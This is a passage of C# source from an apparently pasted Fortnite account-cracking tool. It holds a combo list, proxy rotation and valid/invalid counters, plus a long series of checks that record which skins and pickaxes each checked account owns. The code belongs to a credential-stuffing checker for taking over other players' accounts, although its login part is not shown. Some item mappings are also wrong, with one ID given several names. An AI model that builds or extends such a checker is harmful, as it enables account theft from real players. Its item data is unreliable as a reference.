  944. sw.WriteLine("=> Valor");
  945. }
  946. bool flag98 = x.Contains("AthenaCharacter:cid_133_athena_commando_f_deco");
  947. if (flag98)
  948. {
  949. sw.WriteLine("=> Ventura");
  950. }
  951. bool flag99 = x.Contains("AthenaCharacter:cid_129_athena_commando_m_deco");
  952. if (flag99)
  953. {
  954. sw.WriteLine("=> Venturion");
  955. }
  956. bool flag100 = x.Contains("cid_160_athena_commando_m_speedyred");
  957. if (flag100)
  958. {
  959. sw.WriteLine("=> Vertex");
  960. }
  961. bool flag101 = x.Contains("AthenaCharacter:cid_106_athena_commando_f_taxi");
  962. if (flag101)
  963. {
  964. sw.WriteLine("=> Whiplash");
  965. }
  966. bool flag102 = x.Contains("AthenaCharacter:cid_139_athena_commando_m_fighterpilot");
  967. if (flag102)
  968. {
  969. sw.WriteLine("=> Wingman");
  970. }
  971. bool flag103 = x.Contains("AthenaCharacter:cid_071_athena_commando_m_wukong");
  972. if (flag103)
  973. {
  974. sw.WriteLine("=> Wukong");
  975. }
  976. bool flag104 = x.Contains("AthenaCharacter:cid_045_athena_commando_m_holidaysweater");
  977. if (flag104)
  978. {
  979. sw.WriteLine("=> Yuletide Ranger");
  980. }
  981. bool flag105 = x.Contains("AthenaCharacter:cid_119_athena_commando_f_candy");
  982. if (flag105)
  983. {
  984. sw.WriteLine("=> Zoey");
  985. }
  986. sw.WriteLine("--------------------------------------------------------");
  987. sw.WriteLine("----------------------<Pickaxes>------------------------");
  988. bool flag106 = x.Contains("AthenaPickaxe:pickaxe_id_013_teslacoil");
  989. if (flag106)
  990. {
  991. sw.WriteLine("=> AC/DC");
  992. }
  993. bool flag107 = x.Contains("AthenaPickaxe:pickaxe_id_053_deco");
  994. if (flag107)
  995. {
  996. sw.WriteLine("=> Airfoil");
  997. }
  998. bool flag108 = x.Contains("AthenaPickaxe:pickaxe_id_011_medieval");
  999. if (flag108)
  1000. {
  1001. sw.WriteLine("=> Axecalibur");
  1002. }
  1003. bool flag109 = x.Contains("AthenaPickaxe:pickaxe_id_040_pizza");
  1004. if (flag109)
  1005. {
  1006. sw.WriteLine("=> Axeroni");
  1007. }
  1008. bool flag110 = x.Contains("AthenaPickaxe:sicklebatpickaxe");
  1009. if (flag110)
  1010. {
  1011. sw.WriteLine("=> Batsickle");
  1012. }
  1013. bool flag111 = x.Contains("AthenaPickaxe:pickaxe_id_041_pajamaparty");
  1014. if (flag111)
  1015. {
  1016. sw.WriteLine("=> Bitemark");
  1017. }
  1018. bool flag112 = x.Contains("AthenaPickaxe:pickaxe_id_018_anchor");
  1019. if (flag112)
  1020. {
  1021. sw.WriteLine("=> Bottom Feeder");
  1022. }
  1023. bool flag113 = x.Contains("AthenaPickaxe:pickaxe_id_015_holidaycandycane");
  1024. if (flag113)
  1025. {
  1026. sw.WriteLine("=> Candy Axe");
  1027. }
  1028. bool flag114 = x.Contains("AthenaPickaxe:pickaxe_id_038_carrot");
  1029. if (flag114)
  1030. {
  1031. sw.WriteLine("=> Carrot Stick");
  1032. }
  1033. bool flag115 = x.Contains("AthenaPickaxe:pickaxe_id_017_shark");
  1034. if (flag115)
  1035. {
  1036. sw.WriteLine("=> Chomp Jr.");
  1037. }
  1038. bool flag116 = x.Contains("AthenaPickaxe:skiicepickaxe");
  1039. if (flag116)
  1040. {
  1041. sw.WriteLine("=> Cliffhanger");
  1042. }
  1043. bool flag117 = x.Contains("AthenaPickaxe:defaultpickaxe");
  1044. if (flag117)
  1045. {
  1046. sw.WriteLine("=> Default Pickaxe");
  1047. }
  1048. bool flag118 = x.Contains("AthenaPickaxe:pickaxe_id_054_filmcamera");
  1049. if (flag118)
  1050. {
  1051. sw.WriteLine("=> Director's Cut");
  1052. }
  1053. bool flag119 = x.Contains("AthenaPickaxe:pickaxe_id_016_disco");
  1054. if (flag119)
  1055. {
  1056. sw.WriteLine("=> Disco Brawl");
  1057. }
  1058. bool flag120 = x.Contains("AthenaPickaxe:pickaxe_id_025_dragon");
  1059. if (flag120)
  1060. {
  1061. sw.WriteLine("=> Dragon Axe");
  1062. }
  1063. bool flag121 = x.Contains("AthenaPickaxe:pickaxe_id_062_soccer");
  1064. if (flag121)
  1065. {
  1066. sw.WriteLine("=> Elite Cleat");
  1067. }
  1068. bool flag122 = x.Contains("AthenaPickaxe:pickaxe_id_028_space");
  1069. if (flag122)
  1070. {
  1071. sw.WriteLine("=> EVA");
  1072. }
  1073. bool flag123 = x.Contains("AthenaPickaxe:pickaxe_id_045_valor");
  1074. if (flag123)
  1075. {
  1076. sw.WriteLine("=> Gale Force");
  1077. }
  1078. bool flag124 = x.Contains("AthenaPickaxe:pickaxe_id_051_neonglow");
  1079. if (flag124)
  1080. {
  1081. sw.WriteLine("=> Glow Stick");
  1082. }
  1083. bool flag125 = x.Contains("AthenaPickaxe:pickaxe_id_014_wintercamo");
  1084. if (flag125)
  1085. {
  1086. sw.WriteLine("=> Ice breaker");
  1087. }
  1088. bool flag126 = x.Contains("AthenaPickaxe:pickaxe_id_039_tacticalblack");
  1089. if (flag126)
  1090. {
  1091. sw.WriteLine("=> Instigator");
  1092. }
  1093. bool flag127 = x.Contains("AthenaPickaxe:pickaxe_id_046_candy");
  1094. if (flag127)
  1095. {
  1096. sw.WriteLine("=> Lollipopper");
  1097. }
  1098. bool flag128 = x.Contains("AthenaPickaxe:pickaxe_id_064_gumshoe");
  1099. if (flag128)
  1100. {
  1101. sw.WriteLine("=> Magnifying Axe");
  1102. }
  1103. bool flag129 = x.Contains("AthenaPickaxe:pickaxe_id_048_carbideblack");
  1104. if (flag129)
  1105. {
  1106. sw.WriteLine("=> Onslaught");
  1107. }
  1108. bool flag130 = x.Contains("AthenaPickaxe:pickaxe_id_059_darkeagle");
  1109. if (flag130)
  1110. {
  1111. sw.WriteLine("=> Oracle Axe");
  1112. }
  1113. bool flag131 = x.Contains("AthenaPickaxe:pickaxe_id_029_assassin");
  1114. if (flag131)
  1115. {
  1116. sw.WriteLine("=> Party Animal");
  1117. }
  1118. bool flag132 = x.Contains("AthenaPickaxe:pickaxe_id_031_squeak");
  1119. if (flag132)
  1120. {
  1121. sw.WriteLine("=> Pick Squeak");
  1122. }
  1123. bool flag133 = x.Contains("AthenaPickaxe:pickaxe_flamingo");
  1124. if (flag133)
  1125. {
  1126. sw.WriteLine("=> Pink Flamingo");
  1127. }
  1128. bool flag134 = x.Contains("AthenaPickaxe:pickaxe_id_024_plunger");
  1129. if (flag134)
  1130. {
  1131. sw.WriteLine("=> Plunja");
  1132. }
  1133. bool flag135 = x.Contains("AthenaPickaxe:pickaxe_id_047_carbideblue");
  1134. if (flag135)
  1135. {
  1136. sw.WriteLine("=> Positron");
  1137. }
  1138. bool flag136 = x.Contains("AthenaPickaxe:pickaxe_id_061_wwiipilot");
  1139. if (flag136)
  1140. {
  1141. sw.WriteLine("=> Propeller Axe");
  1142. }
  1143. bool flag137 = x.Contains("AthenaPickaxe:pickaxe_id_012_district");
  1144. if (flag137)
  1145. {
  1146. sw.WriteLine("=> Pulse Axe");
  1147. }
  1148. bool flag138 = x.Contains("AthenaPickaxe:pickaxe_lockjaw");
  1149. if (flag138)
  1150. {
  1151. sw.WriteLine("=> Raider's Revenge");
  1152. }
  1153. bool flag139 = x.Contains("AthenaPickaxe:pickaxe_id_026_brite");
  1154. if (flag139)
  1155. {
  1156. sw.WriteLine("=> Rainbow Smash");
  1157. }
  1158. bool flag140 = x.Contains("AthenaPickaxe:halloweenscythe");
  1159. if (flag140)
  1160. {
  1161. sw.WriteLine("=> Scythe");
  1162. }
  1163. bool flag141 = x.Contains("AthenaPickaxe:pickaxe_id_050_graffiti");
  1164. if (flag141)
  1165. {
  1166. sw.WriteLine("=> Renegade Roller");
  1167. }
  1168. bool flag142 = x.Contains("AthenaPickaxe:pickaxe_id_027_scavenger");
  1169. if (flag142)
  1170. {
  1171. sw.WriteLine("=> Sawtooth");
  1172. }
  1173. bool flag143 = x.Contains("AthenaPickaxe:pickaxe_id_027_scavenger");
  1174. if (flag143)
  1175. {
  1176. sw.WriteLine("=> Ski Boot");
  1177. }
  1178. bool flag144 = x.Contains("AthenaPickaxe:pickaxe_id_027_scavenger");
  1179. if (flag144)
  1180. {
  1181. sw.WriteLine("=> Spectral Axe");
  1182. }
  1183. bool flag145 = x.Contains("AthenaPickaxe:pickaxe_id_037_stealth");
  1184. if (flag145)
  1185. {
  1186. sw.WriteLine("=> Spectre");
  1187. }
  1188. bool flag146 = x.Contains("AthenaPickaxe:pickaxe_id_044_tacticalurbanhammer");
  1189. if (flag146)
  1190. {
  1191. sw.WriteLine("=> Tenderizer");
  1192. }
  1193. bool flag147 = x.Contains("AthenaPickaxe:pickaxe_id_029_assassin");
  1194. if (flag147)
  1195. {
  1196. sw.WriteLine("=> Trusty No. 2");
  1197. }
  1198. bool flag148 = x.Contains("AthenaPickaxe:pickaxe_id_063_vuvuzela");
  1199. if (flag148)
  1200. {
  1201. sw.WriteLine("=> Vuvuzela");
  1202. }
  1203. bool flag149 = x.Contains("AthenaPickaxe:pickaxe_id_022_holidaygiftwrap");
  1204. if (flag149)
  1205. {
  1206. sw.WriteLine("=> Here");
  1207. }
  1208. sw.WriteLine("--------------------------------------------------------");
  1209. sw.WriteLine(Environment.NewLine);
  1210. }
  1211. }));
  1212. }
  1213. catch (Exception ex)
  1214. {
  1215. MessageBox.Show(ex.ToString());
  1216. }
  1217. }
  1218.  
  1219. private ToolTip tp1 = new ToolTip();
  1220. private HashSet<string> Combo = new HashSet<string>();
  1221. private string fileName;
  1222. private string folder;
  1223. private int index;
  1224. private string myFile;
  1225. private List<string> Proxies = new List<string>();
  1226. private Random rnd = new Random();
  1227. private string textfile;
  1228. private List<Thread> tList = new List<Thread>();
  1229. private object tLock = new object();
  1230. private int validcnt;
  1231. private int invalidcnt;
  1232. private int errorcnt;
  1233. private int checkedcnt;
  1234. private object _lock = new object();
  1235.  
  1236. private void timer1_Tick(object sender, EventArgs e)
  1237. {
  1238.  
  1239. }
  1240.  
  1241. private void cmbCapture_SelectedIndexChanged(object sender, EventArgs e)
  1242. {
  1243.  
  1244. }
  1245.  
  1246. private void groupControl1_Paint(object sender, PaintEventArgs e)
  1247. {
  1248.  
  1249. }
  1250.  
  1251. // Fortnite Cracking Content
  1252.  
  1253.  
  1254.  
  1255. // Fortnite Cracking Content
  1256. }
  1257. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement